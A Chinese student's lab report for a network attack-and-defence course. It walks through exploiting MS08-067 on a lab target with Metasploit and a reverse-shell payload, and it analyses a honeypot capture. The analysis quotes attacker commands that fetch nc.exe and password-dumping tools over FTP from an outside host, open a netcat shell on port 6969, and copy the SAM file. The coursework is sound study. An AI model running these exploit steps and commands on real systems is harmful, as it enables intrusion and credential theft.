20212937 曾俊铭

20212937 曾俊铭 2021-2022-2 《网络攻防实践》第八周实践报告

1.实践内容

使用metasploit软件进行windows远程渗透，利用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权。
攻击者成功攻陷了一台由rfp部署的蜜罐主机，要求提取并分析攻击的全部过程（攻击者使用了什么破解工具进行攻击，如何使用这个破解工具进入并控制了系统，获得系统访问权限后做了什么，如何防止这样的攻击）
windows系统远程渗透攻击和分析：
攻方使用metasploit选择漏洞进行攻击，获得控制权
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息

2.实践过程

实践一：Metasploit Windows Attacker
任务：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权
环境：Kali攻击机（192.168.200.2） Windows2K Server靶机（192.168.200.3）

（1）Metasploit目前提供了三种用户使用接口，一个是GUI模式，另一个是console终端模式，第三种是CLI（命令行）模式。msfcli 不提供交互，这里使用最常用的msfconsole

（2）输入msfconsole，运行此命令后将进入msf 命令提示符： msf>

（3）查找ms08_067漏洞，msf > search ms08_067

由上图可知，渗透攻击模块路径为“exploit/windows/smb/ms08_067_netapi”，其中exploit代表模块类型，windows代表目标平台，smb代表目标服务，ms08_067_netapi代表模块名字。模块的源代码文件在Metasploit的安装路径加上这条路径的目录下存着

（4）使用MS08_067漏洞：use exploit/windows/smb/ms08_067_netapi，接着查看攻击载荷基本信息：show payloads，如下图所示：

（5）选择其中的generic/shell_reverse_tcp，即回连至控制端的后门，如下图所示：

（6）首先查看所需的配置选项，如下图所示：

（7）再对各个选项进行配置，把RHOST设置为靶机ip：192.168.200.3；把LPORT，即后门回连的端口设置为5000；把LHOST设置为攻击机ip，即192.168.200.2；设置target，即目标系统类型为0。如下图所示

（8）再次查看配置选项，确保没有错误，如下图所示：

经确认，配置是正确的。

（9）使用exploit命令发起渗透攻击，再使用ipconfig /all查看IP地址及主机名，确认攻击成功，如下图所示：

实践二：
来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
1）攻击者使用了什么破解工具进行攻击
2）攻击者如何使用这个破解工具进入并控制了系统
3）攻击者获得系统访问权限后做了什么
4）我们如何防止这样的攻击
5）你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么?

1）首先用wireshark打开那个snort文件。点击统计-http-请求，可以看到本次攻击的代码

设置限定条件为：ip.addr==172.16.1.106 and http

boot.ini是NT系统的启动文件。而前面的..%c0af..是"/"的Unicode编码
然后我们可以看到攻击者试图向服务器获取一个msadcs.dll文件，执行shell脚本数据为shell ( “cmd /c echo werd >> c : f u n ” )，根据ADM！ROX!YOUR!WORLD特征字符串，表明是msadc（2）.pl工具发起的渗透攻击

因此可以得出，攻击者利用了Unicode和msadcs（2）.pl工具进行攻击

2）攻击者如何使用这个破解工具进入并控制了系统？
在Wireshark中输入ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST"进行过滤，得到SQL语言代码，简化处理后得到shell脚本代码
shell ( “cmd /c echo hacker 2000 >> ftpcom” ) ;
shell ( “cmd /c echo get samdump .dll >> ftpcom” ) ;
shell ( “cmd /c echo get pdump .exe >> ftpcom” ) ;
shell ( “cmd /c echo get nc.exe>>ftpcom” ) |;
shell ( “cmd /c echo quit>>ftpcom” );
shell ( “cmd /c ftp – s : ftpcom- n www.nether.net” )

在 179 号数据包追踪 TCP 流，可以看到如下指令，攻击者创建了一个 ftpcom 脚本：
cmd /c echo user johna2k > ftpcom

在 299 号数据包追踪 TCP 流，发现攻击者试图连接至 FTP 服务器 204.42.253.18，但未成功

在1106 号数据包，FTP 连接成功：

查找ftp连接成功以前的指令，得到如下指令：
copy C:winntsystem32cmd.exe cmd1.exe
c echo open 213.116.251.162 >ftpcom
c echo johna2k >>ftpcom
c echo haxedj00 >>ftpcom
c echo get nc.exe >>ftpcom
c echo get pdump.exe >>ftpcom
c echo get samdump.dll >>ftpcom
c echo quit >>ftpcom
继续查看到 1224 号数据包，看到攻击者执行了：cmd1.exe /c nc -l -p 6969 -e cmd1.exe，表示攻击者连接了 6969 端口，并且获得了访问权限。

3）攻击者获得系统访问权限后做了什么
筛选 tcp.port == 6969，并追踪 TCP 流：

接着我们可以看到攻击者尝试进入但失败

接着列出了用户

然后发了一个 echo 消息到 C 盘根目录文件 README.NOW.Hax0r：

然后删除了许多文件：

使用 rdisk 尝试获得 SAM 口令文件（安全账号管理器），rdisk 是磁盘修复程序，执行 rdisk /s- 备份关键系统信息，在 /repair 目录中就会创建一个名为 sam._ 的 SAM 压缩拷贝，并且攻击者把这个文件拷贝到 har.txt 并打印:

最后离开

4）我们如何防止这样的攻击
升级系统到最新的稳定版本并且要及时更新微软官方的漏洞补丁

5）你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？
在 4351 号数据包，攻击者留下记录：

因此攻击者应该是警觉了目标为一台蜜罐主机

实践三：
团队对抗实践：windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
实验环境：
kali：192.168.200.2（攻击机）
win2k：192.168.200.3（靶机）

当我的Kali虚拟机作为攻击方攻击对方的靶机Win2kServer时，对靶机上的MS08-067漏洞进行远程渗透攻击，具体攻击过程与前面实践一一致，如图显示攻击成功

此时我已经获取对方的Win2kServer的访问权，并能远程在对方的WINNT目录创建文件“ZJM”

对方主机WINNT目录确有文件“ZJM”，表明渗透攻击成功

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息
实验环境
kali:192.168.200.2(攻击机)
win2k:192.168.200.3(靶机)
当Kali虚拟机作为攻击方攻击我的靶机Win2kServer时，对其MS08-067漏洞进行远程渗透攻击，具体攻击过程仍与前面一致，如图我打开Wireshark，监听到对方对我的攻击过程。